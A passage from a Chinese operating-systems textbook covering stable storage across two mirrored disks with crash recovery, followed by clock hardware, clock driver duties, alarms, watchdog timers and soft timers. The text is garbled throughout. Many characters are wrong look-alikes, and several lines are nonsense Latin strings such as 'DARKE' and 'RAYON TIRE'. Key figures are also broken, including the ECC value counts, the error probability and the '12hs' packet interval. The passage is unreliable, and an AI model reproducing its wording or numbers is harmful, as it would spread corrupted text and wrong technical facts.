在 这 样 的 情况 下 ， 重 新 校准 会 在 位 流 中 插入 间隙 ， 因 此 是 不 可 接受 
的 。 称 为 AV 盘 (Audio Visual disk, FI) 的 特殊 驱动 器 永远 不 会 重 
新 校准 ， 因 而 可 用 于 这 样 的 应 用 。 


5.4.5 ”稳定 存储 器 


正如 我 们 已 经 看 到 的 ， 和 磁盘 有 时 会 出 现 错误 。 好 书 区 可 能 突然 变 
成 坏 局 区 ， 整 个 驱动 器 也 可 能 出 乎 意料 地 死 掉 。RAID 可 以 对 几 个 耐 区 
出 错 或 者 整个 驱动 右 朋 浇 提 供 保 护 。 然 而 ，RAID 首 先 不 能 对 将 坏 数 据 
写 下 的 写 错 误 提供 体 扩 ， 并 且 也 不 能 对 写 操 作 期 间 的 朋 江 提供 保 扩 ， 
这 样 就 会 破坏 原始 数据 而 不 能 以 更 新 的 数据 替换 它们 。 


对 于 时 些 应 用 而 言 ， 决 不 丢失 或 破坏 数据 是 绝对 必要 的 ， 即 使 面 
| 临 磁盘 和 CPU 销 误 也 是 如 此 。 理 想 的 情况 是 ， 磁 盘 应 该 始终 没有 错误 
地 工作 。 但 是 ， 这 有 是 做 不 到 的 。 所 能 够 做 到 的 是 ， 一 个 磁盘 子 系统 具 
有 如 下 特性 : 当 一 个 写 命令 发 给 它 时 ， 傍 一 要 么 正确 地 写 数据 ， 要 人 么 
什么 也 不 做 ， 让 现 有 的 数据 完整 无 缺 地 留 下 。 这 样 的 系统 称 为 稳定 存 
fiat (stable storage) ， 并 且 是 在 软件 中 实现 的 (Lampson 和 Sturgis， 
1979) 。 目 标 是 不 惜 一 切 代价 保持 磁 副 的 一 致 性 。 下 面 我 们 将 描述 这 
种 最 初 思想 的 一 个 微小 的 变 体 。 


在 描述 算法 之 前 ， 重 要 的 是 对 于 可 能 发 生 的 销 误 有 一 个 清晰 的 模 
型 。 该 模型 假设 在 磁盘 写 一 个 块 (一 个 或 多 个 恒 区 ) 时 ， 写 操作 要 人 么 
征 正 确 的 ， 要 么 是 错误 的 ， 并 且 该 销 误 可 以 在 随后 的 读 操 作 中 通过 检 
查 ECC 域 的 值 检测 出 来 。 原 则 上 ， 保 证 错误 检测 生根 本 不 可 能 的 ， 这 
是 因为 ， 假 如 使 用 一 个 16 字 节 的 ECC 域 保护 一 个 512 字 节 的 扇 区 ， 那 么 


FEES 个 数据 值 而 仅 有 2144 个 ECC 值 。 因 此 ， 如 果 一 个 块 在 写 操 
作 期 间 出 现 错误 但 是 ECC 没 有 出 错 ， 那 么 存在 着 几 亿 亿 个 错误 的 组 合 
可 以 产生 相同 的 ECC。 如 采 菏 些 这 样 的 错误 出 现 ， 则 错误 不 会 被 检测 
到 。 大 体 上 ， 随 机 数据 具有 正确 的 16 字 节 ECC 的 概率 大 约 是 2 。 该 
概率 值 足够 小 以 至 于 我 们 可 以 视 其 为 零 ， 尽 管 它 实 际 上 并 不 为 零 。 


该 模型 还 假设 一 个 被 正确 写 入 的 山区 可 能 会 日 发 地 变 坏 并 且 变 得 
不 可 读 。 然 而 ， 该 假设 是 :这样 的 事件 非常 少见 ， 以 至 于 在 合理 的 时 
间 间 隔 内 (例如 1 天 ) 让 相同 的 局 区 在 第 二 个 (独立 的 ， 驱动器 上 变 坏 
的 概率 小 到 可 以 名 略 的 程度 。 


该 模型 还 假设 CPU 可 能 出 故障 ， 在 这 样 的 情况 下 只 能 停机。 在 出 
现 故 障 的 时 刻 任何 处 于 进行 中 的 磁 强 写 操作 也 会 停止 ， 导 致 不 正确 的 
数据 写 在 一 个 而 区 中 并 且 后 来 可 能 会 检测 到 不 正确 的 ECC。 在 所 有 这 
些 情况 下 ， 稳 定 存储 紫 束 写 操作 而 言 可 以 提供 100% 的 可 靠 性 ， 要 人 么 整 
正确 地 工作 ， 要 么 就 让 旧 的 数据 原封 不 动 。 当 然 ， 它 不 能 对 物理 灾难 
提供 保护 ， 例 如 ， 发 生地 震 ， 计 算 机 跌落 100m 控 入 一 个 家 颖 并 且 陶 入 
沸腾 的 宕 纺 池 中 ， 在 这 样 的 情况 下 用 软件 将 其 恢复 古 勉 为 其 难 的 。 


稳定 存储 吉 使 用 一 对 完全 相同 的 磁 一 ， 对 应 的 块 一 同 工 作 以 形成 
一 个 无 差错 的 块 。 当 不 存在 错误 时 ， 在 两 个 红 动 右上 对 应 的 块 定 相同 
的 ， 读 取 任 意 一 个 都 可 以 得 到 相同 的 结果 。 为 了 达到 这 一 目的 ， 定义 
了 下 述 三 种 操作 : 


1) 稳 定 写 (stable write) 。 稳 定 写 首 先 将 块 写 到 驱动 器 1 上 ， 然 后 
将 其 读 回 以 校 验 写 的 是 正确 的 。 如 果 写 的 不 正确 ， 那 么 就 再 次 做 写 和 
重读 操作 ， 一 直到 n 次 ， 直 到 正常 为 止 。 经 过 n 次 连续 的 失败 之 后 ， 束 
将 该 块 重 映 味 到 一 个 备用 块 上 ， 并 且 重 复写 和 重读 操作 直到 成 功 为 
Ik, 无论 要 笑 试 多 少 个 备用 块 。 在 对 驱动 紫 1 的 写成 功 之 后 ， 对 红 动 融 
2 上 对 应 的 块 进行 写 和 重读 ， 如 果 和 需要 的 话 就 重复 这 样 的 操作 ， 直 到 最 
后 成 功 为 止 。 如 来 不 存在 CPU 朋 并 ， 那 么 当 稳定 写 完成 后 ， 块 下 正确 
地 被 写 到 两 个 驱动 器 上 ， 并 且 在 两 个 驱动 器 上 得 到 校 验 。 


2) 稳 定 读 (stable read) 。 稳 定 读 首先 从 驱动 器 I 上 读 取 块 。 如 果 这 
一 操作 产生 错误 的 ECC， 则 再 次 尝试 读 操作 ， 一 直到 n 次 。 如 果 所 有 这 
些 操 作者 给 出 错误 的 ECC， 则 从 驱动 硕 2 上 读 取 对 应 的 数据 块 。 给 定 一 
个 成 功 的 稳定 写 为 数据 块 留 下 两 个 可 徘 的 副本 这 样 的 事实 ， 并 且 我 们 
假设 在 合理 的 时 间 间 隔 内 相同 的 块 在 两 个 驱动 器 上 自发 地 变 坏 的 概率 
可 以 忽略 不 计 ， 那 么 稳定 读 束 忌 是 成 功 的 。 


DARKE (crash recovery) 。 甬 溃 之 后 ， 恢 复 程序 扫描 两 个 磁 
盘 ， 比 较 对 应 的 块 。 如 有 果 一 对 块 都 是 好 的 并 且 是 相同 的 ， 就 什么 都 不 
做 。 如 果 其 中 一 个 具有 ECC 错 误 ， 那 么 坏 块 就 用 对 应 的 好 块 来 覆盖 。 
如 果 一 对 块 都 是 好 的 但 是 不 相同 ， 那 么 就 将 驱动 右 1 上 的 块 写 到 驱动 器 
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是 对 每 个 块 写 下 两 个 有 效 鸭 副本 ， 并 且 假 设 目 发 的 钳 误 决 不 会 在 相同 
的 时 刻 发 生 在 两 个 对 应 的 块 上 。 如 采 在 稳定 写 期 间 出 现 CPU 骨 溃 会 怎 
么 样 ? 这 束 取 决 于 前 误 发 生 的 精确 时 间 。 有 5 种 可 能 性 ， 如 图 5-31 所 
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图 5-31 RAYON TIRE Se RZ AY IT 


在 图 5-31a 中 ，CPU 朋 并发 生 在 写 块 的 两 个 副本 之 前 。 在 恢复 的 时 
候 ， 什 么 都 不 用 修改 而 旧 的 值 将 继续 存在 ， 这 是 允许 的 。 


在 图 5-31b 中 ，CPU 朋 演 发 生 在 写 有 驱动 融 1 期 间 ， 破 坏 了 该 块 的 内 
o 然而 恢复 程序 能 够 检测 出 这 一 错误 ， 并 且 从 驱动 絮 2 恢 复 驱 动 器 1 
上 的 块 。 因 此 ， 这 一 朋 溃 的 影响 被 消除 并 且 旧 的 状态 完全 被 恢复 。 


在 图 5-31c 中 ，CPU 朋 并 发 生 在 写 完 驱动 硕 1 之 后 但 是 还 没有 写 驱 动 
器 2 之 前 。 此 时 已 经 过 了 无 法 复原 的 时 刻 ; 恢复 程序 将 块 从 驱动 器 1 复 
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图 5-31d 与 图 5-31b 相 类 似 ， CEPA AIA) FP ER ee TER o ANI] 
的 是 ， 两 个 块 的 最 终 取 值 都 症 新 的 。 


最 后 ， 在 图 5-31e 中 ， 人 恢复 程序 看 到 两 个 块 是 相同 的 ， 所 以 什么 都 
不 用 修改 并 且 在 此 处 写 也 是 成 功 的 。 


对 于 这 一 模式 进行 各 种 各 样 的 优化 和 改进 都 站 可 能 的 。 首 爷 ， 在 
朋 溃 之 后 对 所 有 的 块 两 个 两 个 地 进行 比较 是 可 行 的 ， 但 是 代价 高 昂 。 
一 个 巨大 的 改进 是 在 稳定 写 期 间 跟 踩 被 写 的 是 哪个 块 ， 这 样 在 恢复 的 
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RAM (nonvolatile RAM) ， 它 是 一 个 特殊 的 CMOS 存 储 器 ， 由 锂电 池 
供电 。 这 样 的 电池 能 够 维持 很 多 年 ， 甚 至 有 可 能 是 计算 机 的 整个 生命 
周期 。 与 主 存 不 同 ( 它 在 崩 澳 之 后 就 丢失 了 ) ， 非 易 失 性 RAM 在 月 涡 
之 后 并 不 丢失 。 每 天 的 时 间 通 常 就 保存 在 这 里 (并 且 通 过 一 个 特殊 的 
电路 进行 增值 ) ， 这 就 是 为 什么 计算 机 即使 在 拔 掉 电源 之 后 仍然 知道 
是 什么 时 间 。 


假设 非 易 失 性 RAM 的 儿 个 字 太 可 供 操作 系统 使 用 ， 稳 定 写 束 可 以 
在 开始 写 之 前 将 准备 要 更 新 的 块 的 编号 放 到 非 易 失 性 RAM 里 。 在 成 功 
地 完成 稳定 写 之 后 ， 在 非 易 失 性 RAM 中 的 块 编号 用 一 个 无 效 的 块 编号 
(例如 -1) 覆盖 挥 。 在 这 些 情形 下 ， 崩 并 之 后 恢复 程序 可 以 检验 非 易 失 
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块 的 两 个 副本 进行 正确 性 和 一 致 性 检验 。 


如 有 条 没 有 非 吻 失 性 RAM 可 用 ， 可 以 对 它 模拟 如 下 。 在 稳定 写 开始 
时 ， 用 将 要 个 稳定 写 的 块 的 编号 窗 访 驱动 占 1 上 的 一 个 固定 的 块 ， 然 后 
读 回 该 块 以 对 其 进行 校 验 。 在 使 得 该 块 正 确 之 后 ， 对 驱动 器 2 上 对 应 的 
块 进 行 写 和 校 验 。 当 稳定 写 正确 地 完成 时 ， 用 一 个 无 效 的 块 编 号 履 者 
两 个 块 并 进行 校 验 。 这 样 一 来 ， 朋 并 之 后 束 很 容易 确定 在 衣 浇 期 间 是 
否 有 一 个 稳定 写 正在 进行 中 。 当 然 ， 这 一 技术 为 了 写 一 个 稳定 的 块 需 
要 8 次 额外 的 磁盘 操作 ， 所 以 应 该 极 少量 地 应 用 该 技术 。 


还 有 最 后 一 点 值得 讨论 。 我 们 假设 每 天 每 一 对 块 只 发 生 一 个 好 块 
目 发 损坏 成 为 坏 块 。 如 有 果 经 过 足够 长 的 时 间 ， 另 一 个 块 也 可 能 变 坏 。 
因此 ， 为 了 修复 任何 损害 每 天 必须 对 两 块 磁 表 进 行 一 次 完整 的 扫描 。 
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的 两 个 块 都 未 了 ， 所 有 的 错误 也 都 能 正确 地 修复 。 


5.5 “时 钟 


时 钟 (clock) 又 称 为 定时 器 (timer) ， 由 于 各 种 各 样 的 原因 决定 
了 它 对 于 任何 多 道 程序 设计 系统 的 操作 都 是 至 天 重要 的 。 时 钟 负责 维 
护 时 间 ， 并 且 防 止 一 个 进程 垄断 CPU， 此 外 还 有 其 他 的 功能 。 时 钟 软 
件 可 以 采用 设备 驱动 程序 的 形式 ， 尽 管 时 钟 既 不 像 磁盘 那样 是 一 个 块 
设备 ， 也 不 像 鼠 标 那 样 是 一 个 字符 设备 。 我 们 对 时 钟 的 研究 将 遵循 与 
前 面 几 市 相同 的 模式 ， 首 先 考 虑 时 钟 硬 件 ， 然 后 考虑 时 钟 软件 。 


5.5.1 ”时 钟 硬件 


在 计算 机 里 通常 使 用 两 种 类 型 的 时 钟 ， 这 两 种 类 型 的 时 钟 与 人 们 
使 用 的 钟表 和 手表 有 相当 大 的 鞭 异 。 比较 人 简单 的 时 钟 被 连接 到 110V 或 
220V 的 电源 线 上 ， 这 样 每 个 电压 周期 产生 一 个 中 断 ， 频 率 征 50Hz 或 
60Hz。 这 些 时 钟 过 去 曾经 占据 统治 地 位 ， 但 是 如 今 却 非常 罕见 。 


男 一 种 类 型 的 时 钟 由 三 个 部 件 构 成 ， 蝇 体 振荡 器、 计数 器 和 存储 
寄存 器 ， 如 图 5-32 所 示 。 当 把 一 块 石 贡品 体 适 当地 切 审 并 且 安装 在 一 定 
的 压力 之 下 时 ， 它 束 可 以 产生 非常 精确 的 周期 性 信和 号， 典型 的 频率 范 
围 古 几 百 兆 医 效 ， 具 体 的 频率 值 与 所 选 的 晶体 有 关 。 使 用 电子 事件 可 
以 将 这 一 基础 信号 乘 以 一 个 小 的 整数 来 获得 高 达 1000MHz 甚 至 更 高 的 


频率 。 在 任何 一 台 计 算 机 里 通常 都 可 以 找到 至 少 一 个 这 样 的 电路 ， 它 
给 计算 机 的 各 种 电路 提供 同步 信号 。 该 信号 被 送 到 计数 器 ， 使 其 递减 
计数 至 0。 当 计数 器 变 为 0 时 ， 产 生 一 个 CPU 中 断 。 


晶体 振荡 如 
=a] 


计数 器 在 每 一 
个 脉冲 递减 


于 加 载 计数 器 


图 5-32 可 编程 时 钟 


可 编程 时 钟 通常 具有 几 种 操作 模式 。 在 一 次 完成 模式 (one-shot 
mode) 下 ， 当 时 钟 启 动 时 ， 它 把 存储 寄存 器 的 值 复 制 到 计数 器 中 ， 然 
后 ， 来 目 品 体 的 每 一 个 脉冲 使 计数 种 减 1。 当 计数 器 变 为 0 时 ， 产 生 一 
个 中 断 ， 并 停止 工作 ， 直 到 软件 再 一 次 显 式 地 局 动 它 。 在 方 波 模式 
(square-wave mode) 下 ， 当 计数 器 变 为 0 并 且 产 生 中 断 之 后 ， 存 储 寄 
存 器 的 值 目 动 复 制 到 计数 三 中 ， 并 且 整 个 过 程 无 限期 地 再 次 重复 下 
去 。 这 些 周 期 性 的 中 断 称 为 时 钟 滴答 (clock tick) ° 


可 编程 时 钟 的 优点 是 其 中 断 频 率 可 以 由 软件 控制 。 如 果 采 用 
500MHz 的 晶体 ， 那 么 计数 器 将 每 隔 2ns 脉 动 一 次 。 对 于 (无 符号 ) 32 
位 寄存 器 ， 中 断 可 以 被 编程 为 从 2ns 时 间 间 隔 发 生 一 次 到 8.6s 时 间 间 陋 
发 生 一 次 。 可 编程 时 钟 芯 片 通常 包含 两 个 或 三 个 独立 的 可 编程 时 钟 ， 
并 且 还 具有 许多 其 他 选项 〈 例 如 ， 用 正 计 时 代替 倒计时 、 屏 蔽 中 断 


等 ) 。 


为 了 防止 计算 机 的 电源 被 切断 时 丢失 当前 时 间 ， 大 多 数 计算 机 具 
有 一 个 由 电池 供电 的 备份 时 钟 ， 它 是 由 在 数字 手表 中 使 用 的 那 种 类 型 
的 低 功 耗 电路 实现 的 。 电 池 时 钟 可 以 在 系统 启动 的 时 候 读 出 。 如 果 不 
存在 备份 时 钟 ， 软 件 可 能 会 向 用 户 询问 当前 日 期 和 时 间 。 对 于 一 个 连 
入 网 络 的 系统 而 言 还 有 一 种 从 远程 主机 获取 当前 时 间 的 标准 方法 。 无 
论 是 哪 种 情况 ， 当 前 时 间 都 要 像 UNIX 所 做 的 那样 转换 成 自 1970 年 1 月 1 
日 上 午 12 时 UTC (Universal Time Coordinated， 协 调 世界 时 ， 以 前 称 为 
格林 威 治平 均 时 ) 以 来 的 时 钟 滴答 数 ， 或 者 转换 成 自 某 个 其 他 标准 时 
间 以 来 的 时 钟 滴答 数 。Windows 的 时 间 原 点 是 1980 年 1 月 1 日 。 每 一 次 时 
钟 滴答 都 使 实际 时 间 增 加 一 个 计数 。 通 常会 提供 实用 程序 来 手工 设置 
系统 时 钟 和 备份 时 钟 ， 并 且 使 两 个 时 钟 保持 同步 。 


5.5.2 ”时 钟 软件 


时 钟 硬件 所 做 的 全 部 工作 是 根据 已 知 的 时 间 间 隔 产 生 中 断 。 涉 及 
时 间 的 其 他 所 有 工作 都 必须 由 软件 一 一 时 钟 驱 动 程序 完成 。 时 钟 驱 动 
程序 的 确切 任务 因 操 作 系统 而 异 ， 但 通常 包括 下 面 的 大 多 数 任务 : 


1) 维 护 日 时 间 。 

2) 防 止 进 程 超时 运行 。 

3) 对 CPU 的 使 用 情况 记 账 。 

4) 处 理 用 户 进程 提出 的 alarm 系 统 调用 。 
5) 为 系统 本 身 的 各 个 部 分 提供 监视 定时 器 。 


6) 完 成 概要 剖析 、 监 视 和 统计 信息 收集 。 


时 钟 的 第 一 个 功能 是 维持 正确 的 日 时 间 ， 也 称 为 实际 时 间 (real 
time) ， 这 并 不 难 实现 ， 只 需要 如 前 面 提 到 的 那样 在 每 个 时 钟 滴答 将 计 
数 器 加 1 即 可 。 惟 一 要 当心 的 事情 钙 日 时 间 计 数 右 的 位 数 ， 对 于 一 个 频 
率 为 60Hz 的 时 钟 来 说 ，32 位 的 计数 右 仅 仅 超过 2 年 束 会 洲 出 。 很 显然 ， 
系统 不 可 能 在 32 位 中 按照 目 1970 年 1 月 1 日 以 来 的 时 钟 滴 答 数 来 保存 实 
际 时 间 。 


可 以 采取 三 种 方法 来 解决 这 一 问题 。 第 一 种 方法 是 使 用 一 个 64 位 
的 计数 器 ， 但 这 样 做 使 维护 计数 器 的 代价 很 高 ， 因 为 1 秒 内 需要 做 很 多 
次 维护 计数 器 的 工作 。 第 二 种 方法 是 以 秒 为 单位 维护 日 时 间 ， 而 不 是 
以 时 钟 滴答 为 单位 ， 该 方法 使 用 一 个 辅助 计数 器 来 对 时 钟 滴答 计数 ， 
直到 累计 完整 的 一 秒 。 因 为 2% 秒 超 过 了 136 年 ， 所 以 该 方法 可 以 工作 
到 22 世 纪 。 


第 三 种 方法 是 对 时 钟 滴答 计数 ， 但 是 这 一 计数 工作 是 相对 于 系统 
引导 的 时 间 ， 而 不 是 相对 于 一 个 固定 的 外 部 时 间 。 当 读 入 备份 时 钟 或 
者 用 户 输入 实际 时 间 时 ， 系 统 引导 时 间 就 从 当前 日 时 间 开 始 计算 ， 并 
且 以 任何 方便 的 形式 存放 在 内 存 中 。 以 后 ， 当 请 求 日 时 间 时 ， 存 储 的 
日 时 间 值 加 到 计数 器 上 就 可 以 得 到 当前 的 日 时 间 。 所 有 这 三 种 方法 如 
图 5-33 所 示 。 


64 位 


以 秒 为 单位 ”在 当前 一 秒 内 ”以 时 钟 滴答 / [| 


的 日 时 间 ”的 时 钟 滴答 数 为 单位 计数 


| ~ 


以 时 钟 滴答 为 单位 的 日 时 间 


以 秒 为 单位 的 系 
统 引 导 时 间 
a) b) c) 


图 5-33 维护 日 时 间 的 三 种 方法 


时 钟 的 第 二 个 功能 是 防止 进程 超时 运行 。 每 当局 动 一 个 进程 时 ， 
调度 程序 融 将 一 个 计数 器 初始 化 为 以 时 钟 滴答 为 单位 的 该 进程 时 间 斤 


的 取 值 。 每 次 时 钟 中 断 时 ， 时 钟 驱动 程序 将 时 间 片 计数 器 减 1°。 当 计数 
器 变 为 0 时 ， 时 钟 驱 动 程序 调用 调度 程序 以 激活 为 一 个 进程 。 


时 钟 的 第 三 个 功能 是 CPU 记 账 。 最 精确 的 记 账 方法 是 ， 每 当 一 个 
进程 局 动 时 ， 便 局 动 一 个 不 同 于 主 系 统 是 时 器 的 辅助 定时 右 。 当 进程 
终止 时 ， 读 出 这 个 定时 厦 的 值 束 可 以 知道 该 进程 运行 了 多 长 时 间 。 为 
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后 再 将 其 恢复 。 


一 个 不 太 精 确 但 更 加 简单 的 记 账 方法 是 在 一 个 全 局 变量 中 维护 一 
个 指 守 ， 该 指 守 指向 进程 表 中 当前 运行 的 进程 的 表 项 。 在 每 一 个 时 钟 
滴答 ， 使 当前 进程 的 表 项 中 的 一 个 域 加 1。 通 过 这 一 方法 ， 每 个 时 钟 科 
答 由 在 该 滴答 时 刻 运行 的 进程 “付费 ”。 这 一 策略 的 一 个 小 问题 是 :如 
果 在 一 个 进程 运行 过 程 中 多 次 发 生 中 断 ， 即 使 该 进程 没有 做 多 少 工 
作 ， 它 仍然 要 为 整个 滴答 付费 。 由 于 在 中 断 期 间 恰 当地 对 CPU 进行 记 
账 的 方法 代价 过 于 昂 贯 ， 因 此 很 少 使 用 。 


在 许多 系统 中 ， 进 程 可 以 请 求 操 作 系统 在 一 定 的 时 间 间 隔 之 后 回 
它 报 警 。 和 警报 通常 是 信号 、 中 断 、 消 息 或 者 类 似 的 东西 。 需 要 这 类 报 
警 的 一 个 应 用 二 网 络 ， 当 一 个 数据 包 在 一 定时 间 间 隔 之 内 没有 被 确认 
时 ， 该 数据 包 必须 重 发 。 另 一 个 应 用 是 计算 机 辅助 教学 ， 如 采 学 生 在 
一 定时 间 内 没有 啊 应 ， 束 告诉 他 答案 。 


如 采 时 钟 驱动 程序 拥有 足够 的 时 钟 ， 它 就 可 以 为 每 个 请 求 设 置 
个 单独 的 时 钟 。 如 末 不 是 这 样 的 情况 ， 它 束 必 须 用 一 个 物理 时 钟 来 模 
拟 多 个 虚拟 时 钟 。 一 种 方法 旦 维护 一 张 表 ， 将 所 有 未 完成 的 定时 亏 的 
言 号 有 时刻 记 入 表 中 ， 还 要 维护 一 个 变量 给 出 下 一 个 信和 号 的 时 刻 。 每 当 
日 时 间 更 新 时 ， 时 钟 驱动 程序 进行 检查 以 了 解 最 近 的 信号 是 否 已 经 发 
生 。 如 琳 是 的 话 ， 则 在 表 中 搜索 下 一 个 要 发 生 的 信号 的 时 刻 。 


如 采 预 期 有 许多 信号 ， 那 么 通过 在 一 个 链表 中 把 所 有 未 完成 的 时 
钟 请 求 按时 间 排 序 链接 在 一 起 ， 这 样 来 模拟 多 个 时 钟 则 更 为 有 效 ， 如 
图 5-34 所 示 。 链 表 中 的 每 个 表 项 指出 在 前 一 个 信号 之 后 等 竺 多 少时 钟 滴 
答 引 发 下 一 个 信号 。 在 本 例 中， 等待 处 理 的 信号 对 应 的 时 钟 滴答 分 别 
是 4203、4207、4213、4215 和 4216 ° 


当前 时 间 一 个 信号 
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图 5-34 用 单个 时 钟 模拟 多 个 定时 器 


在 图 5-34 中 ， 经 过 3 个 时 钟 滴 管 发 生 下 一 个 中 断 。 每 一 次 滴答 时 ， 
下 一 个 信号 减 1， 当 它 变 为 0 时 ， 束 引发 与 链表 中 第 一 个 表 项 相对 应 的 


言 号 ， 并 将 这 一 表 项 从 链表 中 删除 ， 然 后 将 下 一 个 信和 号 设置 为 现在 处 
于 链表 头 的 表 项 的 取 值 ， 在 本 例 中 是 4。 


注意 在 时 钟 中 断 期 间 ， 时 钟 驱 动 程序 要 做 几 件 事情 一 一 将 实际 时 
间 增 1， 将 时 间 片 减 1 并 检查 它 是 否 为 0， 对 CPU 记 账 ， 以 及 将 报警 计数 
亏 减 1。 然 而 ， 因 为 这 些 操 作 在 每 一 秒 之 中 要 重复 许多 次 ， 所 以 每 个 操 
作 都 必须 仔细 地 安排 以 加 快速 度 。 


操作 系统 的 组 成 部 分 也 需要 设置 定时 器 ， 这 些 定 时 器 被 称 为 监视 
定时 器 (watchdog timer) "1。 例 如 ， 为 了 避免 磨损 介质 和 磁头 ， 软 盘 
在 不 使 用 时 是 不 旋转 的 。 当 数据 需要 从 软盘 读 出 时 ， 电 机 必须 首先 局 
动 。 只 有 当 软 盘 以 全 速 旋转 时 ，L/O 才 可 以 开始 。 当 一 个 进程 试图 从 一 
个 空闲 的 软盘 读 取 数据 时 ， 软 盘 艳 动 程序 启动 电机 然后 设置 一 个 监视 
定时 器 以 便 在 足够 长 的 时 间 间 隔 之 后 引发 一 个 中 断 〈 因 为 不 存在 来 自 
软盘 本 身 的 达到 速度 的 中 断 ) 。 


时 钟 驱 动 程序 用 来 处 理 监 视 定时 器 的 机 制 和 用 于 用 户 信号 的 机 制 
是 相同 的 。 惟 一 的 区 别 是 当 一 个 定时 器 时 间 到 时 ， 时 钟 驱 动 程序 将 调 
用 一 个 由 调用 者 提供 的 过 程 ， 而 不 是 引发 一 个 信号 。 这 个 过 程 旦 调用 
者 代码 的 一 部 分 。 被 调用 的 过 程 可 以 做 任何 需要 做 的 工作 ， 甚 至 可 以 
引发 一 个 中 断 ， 但 古 在 内 核 之 中 中 断 通 党 是 不 方便 的 并 且 信 号 也 不 存 
在 。 这 就 是 为 什么 要 提供 监视 定时 器 机 制 。 值 得 注意 的 是 ， 只 有 当时 
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才 起 作用 。 


时 钟 最 后 要 做 的 事情 是 剖析 (profiling) 。 某 些 操 作 系 统 提 供 了 一 
种 机 制 ， 通 过 该 机 制 用 户 程序 可 以 让 系统 构造 它 的 程序 计数 器 的 一 个 
直方 多 ， 这 样 它 承 可 以 了 解 时 间 花 在 了 什么 地 方 。 当 剖析 有 是 可 能 的 事 
情 时 ， 在 每 一 时 钟 滴答 驱动 程序 都 要 检查 当前 进程 是 否 正在 被 进行 剖 
析 ， 如 果 是 ， 则 计算 对 应 于 当前 程序 计数 右 的 区 间 (bin) 中 号 (一 段 
地 址 范围 ) ， 然 后 将 该 区 间 的 值 加 1。 这 一 机 制 也 可 用 来 对 系统 本 号 进 
行 痢 析 。 


[1] watchdog timer 也 经 常 译 为 看 | ] 狗 定时 占 。 一 一 译 首 注 
[2] 直方 图 (histogram) 用 于 描述 随机 变量 取 值 分 布 的 情况 ， 虽 然 在 中 
文 术语 中 有 一 个 “图 " 字 ， 但 并 不 是 必须 用 图 形 来 表示 。 它 将 随机 变量 
(对 于 本 例 而 言 是 程序 计数 器 的 取 值 ) 的 值 空间 (对 于 本 例 而 言 是 进 
程 的 地 址 空间 ) 划分 成 若干 个 小 的 区 间 ， 每 个 小 区 间 就 是 一 个 bin。 通 
过 计算 随机 变量 的 取 值 落 在 每 个 小 区 间 内 的 次 数 束 可 以 得 到 直方 图 。 
如 采用 图 形 表示 直方 图 的 话 则 表现 为 一 系列 高 度 不 等 的 柱状 图 形 。 
一 一 译 者 注 


大 多 数 计算 机 拥有 辅助 可 编程 时 钟 ， 可 以 设置 它 以 程序 需要 的 任 
何 速率 引发 定时 器 中 断 。 该 定时 器 是 主 系统 定时 器 以 外 的 ， 而 主 系统 
定时 器 的 功能 已 经 在 上 面 讲 述 了 。 只 要 中 断 频 率 比 较 低 ， 将 这 个 辅助 
定时 器 用 于 应 用 程序 特定 的 目的 就 不 存在 任何 问题 。 但 是 当 应 用 程序 
特定 的 定时 器 的 频率 非常 高 时 ， 麻 烦 就 来 了 。 下 面 我 们 将 简要 描述 一 
个 基于 软件 的 定时 器 模式 ， 它 在 许多 情况 下 性 能 恨 好 ， 甚 至 在 相当 高 
的 频率 下 也 是 如 此 。 这 一 思想 起 因 于 (Aron 和 Druschel，1999) ° X 
于 更 详细 的 细节 ， 请 参阅 他 们 的 论文 。 


一 般 而 言 ， 有 两 种 方法 管理 UO: 中 断 和 轮 询 。 中 断 具 有 较 低 的 等 
竺 时间， 也 号 是 说 ， 它 们 在 事件 本 身 之 后 立即 发 生 ， 上 共有 很 少 的 延迟 
或 者 没有 下 迟 。 另 一 方面 ， 对 于 现代 CPU 而 言 ， 由 于 需要 上 下 文 切 换 
以 及 对 于 流水 线 、TLB 和 高 速 缓存 的 影响 ， 中 断 具 有 相当 大 的 开销 。 


EPI AS) cae: LL DF BYE AR tS SS PET Do I 
避免 了 中 断 ， 但 是 可 能 存在 相当 长 的 等 待 时 间 ， 因 为 一 个 事件 可 能 
好 发 生 在 一 次 轮 询 之 后 ， 在 这 种 情况 下 它 台 要 等 待 几乎 整个 轮 询 间 
隅 。 平 均 而 言 ， 等 竺 时 间 是 轮 询 间 隔 的 一 半 。 


对 于 某 些 应 用 而 言 ， 中 断 的 开销 和 轮 询 的 等 待 时 间 都 是 不 能 
的 。 例 如 ， 考 虑 一 个 高 性 能 的 网 络 ， 如 千 兆 位 以 太 网 。 该 网 络 能 够 每 
12hs 接 收 或 者 发 送 一 个 全 长 的 数据 包 。 为 了 以 优化 的 输出 | 
每 隔 12hs 驶 应 该 发 出 一 个 数据 包 。 


Z 
性能 运行 ， 


达到 这 一 速率 的 一 种 方法 是 当 一 个 数据 包 传 输 完成 时 引发 一 个 中 
岂 ， 或 者 将 辅助 定时 器 设置 为 每 12ps 中 断 一 次 。 问 题 是 在 一 个 300 
MHz 的 Pentium IT 计算 机 上 该 中 断 经 实测 要 花费 4.45hs 的 时 间 (Aron 和 和 
Druschel, 1999) 。 这 样 的 开销 比 20 世 纪 70 年 代 的 计算 机 好 不 了 多 
少 。 例 如 ， 在 大 多 数 小 型 机 上 ， 一 个 中 断 要 占用 4 个 总 线 周 期 : 将 程序 
计数 器 和 PSW 压 入 堆栈 并 且 加 载 一 个 新 的 程序 计数 器 和 PSW“。 现 如 今 
涉及 流水 线 、MMU、TLB 和 高 速 缓存 ， 更 是 增加 了 大 量 的 开销 。 这 些 
影响 可 能 在 时 间 上 使 情况 变 得 更 坏 而 不 是 变 得 更 好 ， 因 此 抵消 了 更 快 
的 时 钟 速 率 。 


软 定时 器 (soft timer) 避免 了 中 断 。 无 论 何 时 当 内 核 因 某 种 其 他 
原因 在 运行 时 ， 在 它 返回 到 用 户 态 之 前 ， 它 都 要 检查 实时 时 钟 以 了 解 
软 定时 器 是 否 到 期 。 如 果 这 个 定时 磊 已 经 到 期 ， 则 执行 被 调度 的 事件 
(例如 ， 传 送 数 据 包 或 者 检查 到 来 的 数据 包 ) ， 而 无 需 切换 到 内 核 
仿 ， 因 为 系统 已 经 在 内 核 态 。 在 完成 工作 之 后 ， 软 定时 器 被 复位 以 便 
再 次 亲 啊 。 要 做 的 全 部 工作 是 将 当前 时 钟 值 复制 给 定时 器 并 且 将 超时 
间隔 加 上 。 


软 定时 絮 随 着 因为 其 他 原因 进入 内 核 的 频率 而 脉动 。 这 些 原因 包 
fi: 


1) 系 统 调用 。 
2)TLB 未 命中 。 
3) 页 面 故障 。 
4)]IO 中 断 。 
